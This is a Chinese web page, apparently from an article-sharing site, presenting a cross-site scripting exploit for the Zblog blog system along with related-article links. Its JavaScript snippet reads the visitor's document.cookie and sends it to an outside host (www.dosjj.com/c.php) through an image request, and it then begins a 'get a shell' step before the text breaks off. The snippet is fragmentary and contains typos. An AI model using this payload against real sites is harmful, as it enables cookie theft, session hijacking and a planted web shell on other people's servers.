Zblog最新跨站漏洞及利用代码Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向... 11-03-11
js里可以写shell,添加用户,偷取cookie然后模拟出真正的转向
xmlhttp=poster();
cookie=document.cookie;
login=cookie.indexof(‘password’)==-1?0:1;
tolocation=’https://www.jb51.net/’;
//get cookie
x=new image();
x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie);
//get a shell
data=”txacontent=
相关文章:
-
-
织梦管理系统后台查找
织梦管理系统后台查找 有时在通过注射得到织梦程序的管理密码时,却发现找不到后台地址。。 这个时候 大家可以尝试下在地址后面加上:/include/dia...
[阅读全文]
-
关于bo-blog的安全隐患
关于bo-blog的安全隐患 bo-blog是一款外观好看,而且当前流行的个人博客系统,在很多下载站你都可以找到这套程序,而且甚至有很多安全界的人都使用着这...
[阅读全文]
-
-
-
版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。
发表评论